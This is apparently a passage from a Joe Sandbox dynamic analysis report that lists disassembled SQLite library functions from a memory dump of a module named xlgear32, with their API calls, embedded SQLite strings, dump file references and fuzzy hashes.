                                                                          Function 609256E5 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 3064317574-0
                                                                          • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                          • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                                          • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                          • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                                          Function 609255FF Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                          • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                          • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                          • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                          Function 6092562A Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                          • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                                          • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                          • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                                          Function 6090F435 Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                          • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                          • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                          • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                          Function 6096C598 Relevance: 51.2, APIs: 22, Strings: 7, Instructions: 417COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                          • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                          • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                          • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                          • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                          • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                          • API String ID: 1320758876-2501389569
                                                                          • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                          • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                          • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                          • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                          Function 60926471 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                          • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                          • API String ID: 937752868-2111127023
                                                                          • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                          • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                                          • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                          • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                                          Function 6092A6C1 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 352COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                          • String ID: @$access$cache
                                                                          • API String ID: 4158134138-1361544076
                                                                          • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                          • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                          • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                          • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                          Function 6094844A Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 374COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                          • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                          • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                          • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                          • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                          • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                          • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                          • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                          • BEGIN;, xrefs: 609485DB
                                                                          • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                          • API String ID: 632333372-52344843
                                                                          • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                          • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                          • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                          • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                          Function 609602C8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                          • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                          • sqlite3_free.SQLITE3 ref: 609605EA
                                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                          • sqlite3_free.SQLITE3 ref: 60960618
                                                                          • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                          • String ID: offsets
                                                                          • API String ID: 463808202-2642679573
                                                                          • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                          • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                          • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                          • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                          Function 6091A3AA Relevance: 16.7, APIs: 11, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                          • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                          • String ID:
                                                                          • API String ID: 2903785150-0
                                                                          • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                          • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                          • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                          • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                          Function 6092854D Relevance: 15.4, APIs: 10, Instructions: 432COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_malloc
                                                                          • String ID:
                                                                          • API String ID: 423083942-0
                                                                          • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                          • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                          • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                          • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                          Function 60912453 Relevance: 15.2, APIs: 10, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                          • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                          • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                          • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                          • String ID:
                                                                          • API String ID: 3556715608-0
                                                                          • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                          • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                          • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                          • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                          Function 6095F5D9 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                          • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                          • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                          • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                          • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                          • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                          • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                          • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                          • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                          • String ID:
                                                                          • API String ID: 1866449048-0
